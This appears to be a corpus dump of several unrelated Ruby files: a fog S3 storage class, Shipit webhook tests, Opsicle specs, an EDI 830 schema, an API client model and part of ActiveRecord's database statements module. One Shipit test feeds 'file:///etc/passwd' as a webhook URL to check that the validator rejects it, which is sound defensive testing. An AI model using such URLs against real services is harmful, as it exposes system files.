"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read-write'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
},
{
"Permission" => "WRITE",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'authenticated-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
end
end
def self.data
@data ||= Hash.new do |hash, region|
hash[region] = Hash.new do |region_hash, key|
region_hash[key] = {
:acls => {
:bucket => {},
:object => {}
},
:buckets => {},
:cors => {
:bucket => {}
}
}
end
end
end
def self.reset
@data = nil
end
def initialize(options={})
require 'mime/types'
@use_iam_profile = options[:use_iam_profile]
setup_credentials(options)
options[:region] ||= 'us-east-1'
@host = options[:host] || case options[:region]
when 'us-east-1'
's3.amazonaws.com'
else
"s3-#{options[:region]}.amazonaws.com"
end
@scheme = options[:scheme] || 'https'
@region = options[:region]
end
def data
self.class.data[@region][@aws_access_key_id]
end
def reset_data
self.class.data[@region].delete(@aws_access_key_id)
end
def signature(params)
"foo"
end
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
end
end
class Real
include Utils
include Fog::AWS::CredentialFetcher::ConnectionMethods
# Initialize connection to S3
#
# ==== Notes
# options parameter must include values for :aws_access_key_id and
# :aws_secret_access_key in order to create a connection
#
# ==== Examples
# s3 = Fog::Storage.new(
# :provider => "AWS",
# :aws_access_key_id => your_aws_access_key_id,
# :aws_secret_access_key => your_aws_secret_access_key
# )
#
# ==== Parameters
# * options<~Hash> - config arguments for connection. Defaults to {}.
#
# ==== Returns
# * S3 object with connection to aws.
def initialize(options={})
require 'fog/core/parser'
require 'mime/types'
@use_iam_profile = options[:use_iam_profile]
setup_credentials(options)
@connection_options = options[:connection_options] || {}
if @endpoint = options[:endpoint]
endpoint = URI.parse(@endpoint)
@host = endpoint.host
@path = if endpoint.path.empty?
'/'
else
endpoint.path
end
@port = endpoint.port
@scheme = endpoint.scheme
else
options[:region] ||= 'us-east-1'
@region = options[:region]
@host = options[:host] || case options[:region]
when 'us-east-1'
's3.amazonaws.com'
else
"s3-#{options[:region]}.amazonaws.com"
end
@path = options[:path] || '/'
@persistent = options.fetch(:persistent, false)
@port = options[:port] || 443
@scheme = options[:scheme] || 'https'
end
@connection = Fog::Connection.new("#{@scheme}://#{@host}:#{@port}#{@path}", @persistent, @connection_options)
end
def reload
@connection.reset
end
def signature(params)
string_to_sign =
<<-DATA
#{params[:method].to_s.upcase}
#{params[:headers]['Content-MD5']}
#{params[:headers]['Content-Type']}
#{params[:headers]['Date']}
DATA
amz_headers, canonical_amz_headers = {}, ''
for key, value in params[:headers]
if key[0..5] == 'x-amz-'
amz_headers[key] = value
end
end
amz_headers = amz_headers.sort {|x, y| x[0] <=> y[0]}
for key, value in amz_headers
canonical_amz_headers << "#{key}:#{value}\n"
end
string_to_sign << canonical_amz_headers
subdomain = params[:host].split(".#{@host}").first
unless subdomain =~ /^(?:[a-z]|\d(?!\d{0,2}(?:\.\d{1,3}){3}$))(?:[a-z0-9]|\.(?![\.\-])|\-(?![\.])){1,61}[a-z0-9]$/
Fog::Logger.warning("fog: the specified s3 bucket name(#{subdomain}) is not a valid dns name, which will negatively impact performance. For details see: http://docs.amazonwebservices.com/AmazonS3/latest/dev/BucketRestrictions.html")
params[:host] = params[:host].split("#{subdomain}.")[-1]
if params[:path]
params[:path] = "#{subdomain}/#{params[:path]}"
else
params[:path] = subdomain
end
subdomain = nil
end
canonical_resource = @path.dup
unless subdomain.nil? || subdomain == @host
canonical_resource << "#{Fog::AWS.escape(subdomain).downcase}/"
end
canonical_resource << params[:path].to_s
canonical_resource << '?'
for key in (params[:query] || {}).keys.sort
if %w{
acl
cors
delete
lifecycle
location
logging
notification
partNumber
policy
requestPayment
response-cache-control
response-content-disposition
response-content-encoding
response-content-language
response-content-type
response-expires
torrent
uploadId
uploads
versionId
versioning
versions
website
}.include?(key)
canonical_resource << "#{key}#{"=#{params[:query][key]}" unless params[:query][key].nil?}&"
end
end
canonical_resource.chop!
string_to_sign << canonical_resource
signed_string = @hmac.sign(string_to_sign)
Base64.encode64(signed_string).chomp!
end
private
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
@hmac = Fog::HMAC.new('sha1', @aws_secret_access_key)
end
def request(params, &block)
refresh_credentials_if_expired
params[:headers]['Date'] = Fog::Time.now.to_date_header
params[:headers]['x-amz-security-token'] = @aws_session_token if @aws_session_token
params[:headers]['Authorization'] = "AWS #{@aws_access_key_id}:#{signature(params)}"
# FIXME: ToHashParser should make this not needed
original_params = params.dup
begin
response = @connection.request(params, &block)
rescue Excon::Errors::TemporaryRedirect => error
uri = URI.parse(error.response.is_a?(Hash) ? error.response[:headers]['Location'] : error.response.headers['Location'])
Fog::Logger.warning("fog: followed redirect to #{uri.host}, connecting to the matching region will be more performant")
response = Fog::Connection.new("#{@scheme}://#{uri.host}:#{@port}", false, @connection_options).request(original_params, &block)
end
response
end
end
end
end
end
| 35.188406 | 245 | 0.545511 |
bb3851313949605be11ac7a2fab566b7a7f7f2f9 | 3,540 | # frozen_string_literal: true
require 'test_helper'
module Shipit
class HookTest < ActiveSupport::TestCase
setup do
@stack = shipit_stacks(:shipit)
@hook = shipit_hooks(:shipit_deploys)
end
test "#url must be valid" do
@hook.delivery_url = 'file:/ad"fa/adfa'
refute @hook.valid?
assert_equal ['Delivery url is not a valid URL'], @hook.errors.full_messages
end
test "#url must not be localhost" do
@hook.delivery_url = 'file:///etc/passwd'
refute @hook.valid?
assert_equal ['Delivery url is not a valid URL'], @hook.errors.full_messages
end
test "#events is accessible as an array" do
assert_equal %w(deploy rollback), @hook.events
end
test "#events can only contain a defined set of values" do
@hook.events = %w(foo)
refute @hook.valid?
assert_equal ["Events is not a strict subset of #{Hook::EVENTS.inspect}"], @hook.errors.full_messages
end
test ".deliver schedules a delivery for each matching hook" do
assert_enqueued_jobs(2, only: DeliverHookJob) do
Hook.deliver(:deploy, @stack, 'foo' => 42)
end
end
test ".deliver! sends request with correct method, headers, and body" do
stub_request(:post, @hook.delivery_url).to_return(body: 'OK')
body = { 'foo' => 42 }
expected_body = JSON.pretty_generate(body)
expected_signature = Hook::DeliverySigner.new(@hook.secret).sign(expected_body)
perform_enqueued_jobs(only: DeliverHookJob) do
@hook.deliver!(:deploy, body)
end
assert_performed_jobs 1
assert_requested :post, @hook.delivery_url do |req|
req.headers['X-Shipit-Signature'] == expected_signature
end
end
test ".deliver! sends without signature if no secret is configured" do
stub_request(:post, @hook.delivery_url).to_return(body: 'OK')
@hook.update!(secret: '')
body = { 'foo' => 42 }
perform_enqueued_jobs(only: DeliverHookJob) do
@hook.deliver!(:deploy, body)
end
assert_performed_jobs 1
assert_requested :post, @hook.delivery_url do |req|
!req.headers.key?('X-Shipit-Signature')
end
end
test ".scoped? returns true if the hook has a stack_id" do
@hook.stack_id = nil
refute @hook.scoped?
@hook.stack_id = 42
assert @hook.scoped?
end
test ".emit schedules an EmitEventJob" do
assert_enqueued_jobs(1, only: EmitEventJob) do
Hook.emit(:deploy, @stack, 'foo' => 42)
end
end
test ".emit calls #deliver on internal hooks" do
original_receivers = Shipit.internal_hook_receivers
FakeReceiver = Module.new
FakeReceiver.expects(:deliver).with(:deploy, @stack, 'foo' => 42)
Shipit.internal_hook_receivers << FakeReceiver
Hook.emit(:deploy, @stack, 'foo' => 42)
ensure
Shipit.internal_hook_receivers = original_receivers
end
test ".emit calls no internal hooks if there are no internal_hook_receivers" do
original_receivers = Shipit.internal_hook_receivers
Shipit.internal_hook_receivers = nil
Hook.emit(:deploy, @stack, 'foo' => 42)
ensure
Shipit.internal_hook_receivers = original_receivers
end
test ".coerce_payload coerces anonymous user correctly" do
locked_stack = Stack.first
locked_stack.lock("Some Reason", nil)
serialized = Hook.coerce_payload(stack: locked_stack)
assert_json_document(serialized, "stack.lock_author.anonymous", true)
end
end
end
| 32.477064 | 107 | 0.668644 |
62f7199e40e2c691d328d5c30425ec1706ca96b1 | 2,517 | require "spec_helper"
require "opsicle"
module Opsicle
describe Update do
subject { Update.new("env", "type") }
let(:client) { double }
let(:env) { "env" }
let(:type) { "type" }
let(:values) { { :foo => "bar" } }
before do
allow(Client).to receive(:new).with('env') { client }
allow(client).to receive_message_chain("config.opsworks_config.[]") { 123 }
end
context "#execute" do
it "should update and print results" do
allow(subject).to receive(:describe) { "tacos" }
expect(subject).to receive(:print).with("tacos", "tacos")
api_opts = values.merge(:type_id => 123)
expect(client).to receive(:api_call).with("update_type", api_opts)
subject.execute(values, api_opts)
end
end
context "#describe" do
it "should return data for type" do
expect(client).to receive(:api_call).with("describe_types", :type_ids => [123]).and_return(:types => [])
subject.describe
end
end
context "#update" do
it "should update values for type" do
api_opts = values.merge(:type_id => 123)
expect(client).to receive(:api_call).with("update_type", api_opts)
subject.update(values)
end
end
context "#print" do
it "should print no changes without table" do
allow(Hashdiff).to receive(:diff) { [] }
expect(Output).to receive(:say).with("Changes: 0") { nil }
expect(Output).to_not receive(:terminal)
subject.print(nil, nil)
end
it "should print changes with table" do
allow(Hashdiff).to receive(:diff) { [%w[- nyan 1], %w[+ cat 2],%w[~ taco 3 4]] }
expect(Output).to receive(:say).with("Changes: 3") { nil }
allow(Output).to receive_message_chain("terminal.say")
allow(Output).to receive_message_chain("terminal.color")
subject.print(nil, nil)
end
end
context "#format_diff" do
let(:diff) { [%w[- nyan 1], %w[+ cat 2],%w[~ taco 3 4]] }
let(:formatted_diff) {
[%w[r- rnyan r1 r], %w[a+ acat a a2], %w[m~ mtaco m3 m4]]
}
it "should align columns and colorize" do
allow(Output).to receive(:format).with(anything, :removal) { |arg| "r#{arg}"}
allow(Output).to receive(:format).with(anything, :addition) { |arg| "a#{arg}"}
allow(Output).to receive(:format).with(anything, :modification) { |arg| "m#{arg}"}
expect(subject.format_diff(diff)).to eq(formatted_diff)
end
end
end
end
| 34.479452 | 112 | 0.599126 |
7a5e70db6380fc3fc083887f1c0dc2c77fb233c6 | 67 | module RuboCop
module Aha
VERSION = '0.8.1'.freeze
end
end
| 11.166667 | 28 | 0.656716 |
4ae0224ff7ae66f420260bcdc7d82dfd5dd749bd | 8,328 | # frozen_string_literal: true
module Stupidedi
module TransactionSets
module FortyTen
module Implementations
b = Builder
d = Schema
r = SegmentReqs
e = ElementReqs
s = SegmentDefs
PS830 = b.build("PS", "830", "",
d::TableDef.header("Header",
b::Segment(10, s:: ST, "Transaction Set Header #1", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Transaction Set Identifier Code", b::Values("830")),
b::Element(e::Required, "Transaction Set Control Number")),
b::Segment(20, s::BFR, "Beginning Segment for Planning Schedule #1", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Transaction Set Purpose Code", b::Values("00")),
b::Element(e::Situational, "Reference Identification"),
b::Element(e::Situational, "Release Number"),
b::Element(e::Required, "Schedule Type Qualifier", b::Values("SH")),
b::Element(e::Required, "Schedule Quantity Qualifier", b::Values("A")),
b::Element(e::Required, "Date"),
b::Element(e::Situational, "Date"),
b::Element(e::Required, "Date"),
b::Element(e::NotUsed, ""),
b::Element(e::Situational, "Purchase Order Number")),
b::Segment(50, s::REF, "Reference Identification #1", r::Situational, d::RepeatCount.bounded(12),
b::Element(e::Required, "Reference Identification Qualifier", b::Values("ZZ")),
b::Element(e::Situational, "Reference Identification"),
b::Element(e::Situational, "Description")),
d::LoopDef.build("N1 #1", d::RepeatCount.bounded(2),
b::Segment(230, s:: N1, "Name - Header", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Entity Identifier Code", b::Values("BT", "EV")),
b::Element(e::Situational, "Name"),
b::Element(e::Situational, "Identification Code Qualifier", b::Values("01","ZZ")),
b::Element(e::Situational, "Identification Code"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")))),
d::TableDef.header("Detail",
d::LoopDef.build("LIN - Detail 1", d::RepeatCount.unbounded,
b::Segment(10, s::LIN, "Warehouse Shipment Identification - Detail 1", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Reporting Code", b::Values("F")),
b::Element(e::Required, "Depositor Order Number"),
b::Element(e::Situational, "Date"),
b::Element(e::Required, "Shipment Identification Number"),
b::Element(e::Situational, "Agent Shipment ID Number"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")),
b::Segment(20, s::UIT, "Unit Detail - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Composite Unit of Measure",
b::Element(e::Required, "Unit or Basis for Measurement Code", b::Values("PC")),
b::Element(e::NotUsed, "Exponent"),
b::Element(e::NotUsed, "Multiplier"),
b::Element(e::Situational, "Unit or Basis for Measurement Code", b::Values("LB")),
b::Element(e::NotUsed, "Exponent"),
b::Element(e::Situational, "Multiplier")),
b::Element(e::Situational, "Unit Price")),
b::Segment(80, s::PID, "Product/Item Description - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Item Description Type", b::Values("F")),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::Required, "Description"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")),
d::LoopDef.build("N1 #1", d::RepeatCount.bounded(1),
b::Segment(320, s:: N1, "Name - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Entity Identifier Code", b::Values("ST", "SF")),
b::Element(e::Situational, "Name"),
b::Element(e::Situational, "Identification Code Qualifier", b::Values("91")),
b::Element(e::Situational, "Identification Code"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""))),
d::LoopDef.build("SDP #1", d::RepeatCount.bounded(1),
b::Segment(450, s::SDP, "Ship/Delivery Pattern - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Ship/Delivery or Calendar Pattern Code", b::Values("Y")),
b::Element(e::Required, "Ship/Delivery Pattern Time Code", b::Values("Y"))),
b::Segment(460, s::FST, "Forecast Schedule - Detail 1", r::Situational, d::RepeatCount.bounded(6),
b::Element(e::Required, "Quantity"),
b::Element(e::Required, "Forecast Qualifier", b::Values("C", "D")),
b::Element(e::Required, "Forecast Timing Qualifier", b::Values("F")),
b::Element(e::Required, "Date"),
b::Element(e::Situational, "Date"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::Situational, "Reference Identification Qualifier"),
b::Element(e::Situational, "Reference Identification"))),
d::LoopDef.build("SHP #1", d::RepeatCount.bounded(1),
b::Segment(470, s::SHP, "Shipped/Received Information - Detail 1", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Situational, "Quantity Qualifier", b::Values("02")),
b::Element(e::Situational, "Quantity"),
b::Element(e::Situational, "Date/Time Qualifier", b::Values("011")),
b::Element(e::Situational, "Date"))))),
d::TableDef.header("Summary",
b::Segment(10, s::CTT, "Transaction Totals", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Number of Units Shipped"),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, ""),
b::Element(e::NotUsed, "")),
b::Segment(30, s::SE, "Transaction Set Trailer", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Number of Included Segments"),
b::Element(e::Required, "Transaction Set Control Number"))))
end
end
end
end
| 57.833333 | 125 | 0.495677 |
f7d016f9fc05ca84c0b7d306bb6ab68337c9cc1a | 95 | # desc "Explaining what the task does"
# task :heerschable_table do
# # Task goes here
# end
| 19 | 38 | 0.705263 |
8765bc74464977f7ba2b8a53690ce313d6264c83 | 5,688 | =begin
#Topological Inventory
#Topological Inventory
OpenAPI spec version: 0.1.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 3.3.4
=end
require 'date'
module TopologicalInventoryApiClient
class ServiceInstancesCollection
attr_accessor :meta
attr_accessor :links
attr_accessor :data
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'meta' => :'meta',
:'links' => :'links',
:'data' => :'data'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'meta' => :'CollectionMetadata',
:'links' => :'CollectionLinks',
:'data' => :'Array<ServiceInstance>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'meta')
self.meta = attributes[:'meta']
end
if attributes.has_key?(:'links')
self.links = attributes[:'links']
end
if attributes.has_key?(:'data')
if (value = attributes[:'data']).is_a?(Array)
self.data = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
meta == o.meta &&
links == o.links &&
data == o.data
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[meta, links, data].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = TopologicalInventoryApiClient.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 27.882353 | 107 | 0.608122 |
1cd26cb2bfef0eb843e401b3a809157c199cb1fc | 862 | Pod::Spec.new do |s|
s.name = 'DBAttachmentPickerController'
s.version = '1.1.4'
s.authors = { 'Denis Bogatyrev' => '[email protected]' }
s.summary = 'This powerful component allows to select different types of files from different sources on your device'
s.homepage = 'https://github.com/d0ping/DBAttachmentPickerController'
s.license = { :type => 'MIT' }
s.requires_arc = true
s.platform = :ios, '8.0'
s.source = { :git => 'https://github.com/d0ping/DBAttachmentPickerController.git', :tag => "#{s.version}" }
s.source_files = 'Source/**/*.{h,m}'
s.resources = 'Source/**/*.{xib}'
s.resource_bundle = { 'DBAttachmentPickerController' => ['Source/Localization/*.lproj'] }
s.public_header_files = 'Source/**/*.h'
s.dependency 'BEMCheckBox', '~> 1.4.1'
s.dependency 'NYTPhotoViewer'
end
| 45.368421 | 124 | 0.648492 |
620d4918a71c10deea9818a9294ed0e637ba5bd8 | 605 | # frozen_string_literal: true
class ReportManager
def initialize(fastlane:, output_directory:)
@fastlane = fastlane
@output_directory = output_directory
end
def produce_report(scheme:, workspace:, report_targets:, test_output_directory:)
xccov_file_direct_path = "#{test_output_directory}/#{scheme}.xcresult"
@fastlane.xcov(
scheme: scheme,
workspace: workspace,
output_directory: @output_directory,
xccov_file_direct_path: xccov_file_direct_path,
include_targets: report_targets,
markdown_report: true,
html_report: false
)
end
end
| 27.5 | 82 | 0.732231 |
1d36c3c8b115ec7437de103ea61d9d2f11af8492 | 18,994 | # frozen_string_literal: true
module ActiveRecord
module ConnectionAdapters # :nodoc:
module DatabaseStatements
def initialize
super
reset_transaction
end
# Converts an arel AST to SQL
def to_sql(arel_or_sql_string, binds = [])
sql, _ = to_sql_and_binds(arel_or_sql_string, binds)
sql
end
def to_sql_and_binds(arel_or_sql_string, binds = []) # :nodoc:
if arel_or_sql_string.respond_to?(:ast)
unless binds.empty?
raise "Passing bind parameters with an arel AST is forbidden. " \
"The values must be stored on the AST directly"
end
sql, binds = visitor.accept(arel_or_sql_string.ast, collector).value
[sql.freeze, binds || []]
else
[arel_or_sql_string.dup.freeze, binds]
end
end
private :to_sql_and_binds
# This is used in the StatementCache object. It returns an object that
# can be used to query the database repeatedly.
def cacheable_query(klass, arel) # :nodoc:
if prepared_statements
sql, binds = visitor.accept(arel.ast, collector).value
query = klass.query(sql)
else
collector = PartialQueryCollector.new
parts, binds = visitor.accept(arel.ast, collector).value
query = klass.partial_query(parts)
end
[query, binds]
end
# Returns an ActiveRecord::Result instance.
def select_all(arel, name = nil, binds = [], preparable: nil)
arel = arel_from_relation(arel)
sql, binds = to_sql_and_binds(arel, binds)
if !prepared_statements || (arel.is_a?(String) && preparable.nil?)
preparable = false
else
preparable = visitor.preparable
end
if prepared_statements && preparable
select_prepared(sql, name, binds)
else
select(sql, name, binds)
end
end
# Returns a record hash with the column names as keys and column values
# as values.
def select_one(arel, name = nil, binds = [])
select_all(arel, name, binds).first
end
# Returns a single value from a record
def select_value(arel, name = nil, binds = [])
single_value_from_rows(select_rows(arel, name, binds))
end
# Returns an array of the values of the first column in a select:
# select_values("SELECT id FROM companies LIMIT 3") => [1,2,3]
def select_values(arel, name = nil, binds = [])
select_rows(arel, name, binds).map(&:first)
end
# Returns an array of arrays containing the field values.
# Order is the same as that returned by +columns+.
def select_rows(arel, name = nil, binds = [])
select_all(arel, name, binds).rows
end
def query_value(sql, name = nil) # :nodoc:
single_value_from_rows(query(sql, name))
end
def query_values(sql, name = nil) # :nodoc:
query(sql, name).map(&:first)
end
def query(sql, name = nil) # :nodoc:
exec_query(sql, name).rows
end
# Executes the SQL statement in the context of this connection and returns
# the raw result from the connection adapter.
# Note: depending on your database connector, the result returned by this
# method may be manually memory managed. Consider using the exec_query
# wrapper instead.
def execute(sql, name = nil)
raise NotImplementedError
end
# Executes +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_query(sql, name = "SQL", binds = [], prepare: false)
raise NotImplementedError
end
# Executes insert +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_insert(sql, name = nil, binds = [], pk = nil, sequence_name = nil)
sql, binds = sql_for_insert(sql, pk, nil, sequence_name, binds)
exec_query(sql, name, binds)
end
# Executes delete +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_delete(sql, name = nil, binds = [])
exec_query(sql, name, binds)
end
# Executes the truncate statement.
def truncate(table_name, name = nil)
raise NotImplementedError
end
# Executes update +sql+ statement in the context of this connection using
# +binds+ as the bind substitutes. +name+ is logged along with
# the executed +sql+ statement.
def exec_update(sql, name = nil, binds = [])
exec_query(sql, name, binds)
end
# Executes an INSERT query and returns the new record's ID
#
# +id_value+ will be returned unless the value is +nil+, in
# which case the database will attempt to calculate the last inserted
# id and return that value.
#
# If the next id was calculated in advance (as in Oracle), it should be
# passed in as +id_value+.
def insert(arel, name = nil, pk = nil, id_value = nil, sequence_name = nil, binds = [])
sql, binds = to_sql_and_binds(arel, binds)
value = exec_insert(sql, name, binds, pk, sequence_name)
id_value || last_inserted_id(value)
end
alias create insert
# Executes the update statement and returns the number of rows affected.
def update(arel, name = nil, binds = [])
sql, binds = to_sql_and_binds(arel, binds)
exec_update(sql, name, binds)
end
# Executes the delete statement and returns the number of rows affected.
def delete(arel, name = nil, binds = [])
sql, binds = to_sql_and_binds(arel, binds)
exec_delete(sql, name, binds)
end
# Returns +true+ when the connection adapter supports prepared statement
# caching, otherwise returns +false+
def supports_statement_cache? # :nodoc:
true
end
deprecate :supports_statement_cache?
# Runs the given block in a database transaction, and returns the result
# of the block.
#
# == Nested transactions support
#
# Most databases don't support true nested transactions. At the time of
# writing, the only database that supports true nested transactions that
# we're aware of, is MS-SQL.
#
# In order to get around this problem, #transaction will emulate the effect
# of nested transactions, by using savepoints:
# https://dev.mysql.com/doc/refman/5.7/en/savepoint.html
# Savepoints are supported by MySQL and PostgreSQL. SQLite3 version >= '3.6.8'
# supports savepoints.
#
# It is safe to call this method if a database transaction is already open,
# i.e. if #transaction is called within another #transaction block. In case
# of a nested call, #transaction will behave as follows:
#
# - The block will be run without doing anything. All database statements
# that happen within the block are effectively appended to the already
# open database transaction.
# - However, if +:requires_new+ is set, the block will be wrapped in a
# database savepoint acting as a sub-transaction.
#
# === Caveats
#
# MySQL doesn't support DDL transactions. If you perform a DDL operation,
# then any created savepoints will be automatically released. For example,
# if you've created a savepoint, then you execute a CREATE TABLE statement,
# then the savepoint that was created will be automatically released.
#
# This means that, on MySQL, you shouldn't execute DDL operations inside
# a #transaction call that you know might create a savepoint. Otherwise,
# #transaction will raise exceptions when it tries to release the
# already-automatically-released savepoints:
#
# Model.connection.transaction do # BEGIN
# Model.connection.transaction(requires_new: true) do # CREATE SAVEPOINT active_record_1
# Model.connection.create_table(...)
# # active_record_1 now automatically released
# end # RELEASE SAVEPOINT active_record_1 <--- BOOM! database error!
# end
#
# == Transaction isolation
#
# If your database supports setting the isolation level for a transaction, you can set
# it like so:
#
# Post.transaction(isolation: :serializable) do
# # ...
# end
#
# Valid isolation levels are:
#
# * <tt>:read_uncommitted</tt>
# * <tt>:read_committed</tt>
# * <tt>:repeatable_read</tt>
# * <tt>:serializable</tt>
#
# You should consult the documentation for your database to understand the
# semantics of these different levels:
#
# * https://www.postgresql.org/docs/current/static/transaction-iso.html
# * https://dev.mysql.com/doc/refman/5.7/en/set-transaction.html
#
# An ActiveRecord::TransactionIsolationError will be raised if:
#
# * The adapter does not support setting the isolation level
# * You are joining an existing open transaction
# * You are creating a nested (savepoint) transaction
#
# The mysql2 and postgresql adapters support setting the transaction
# isolation level.
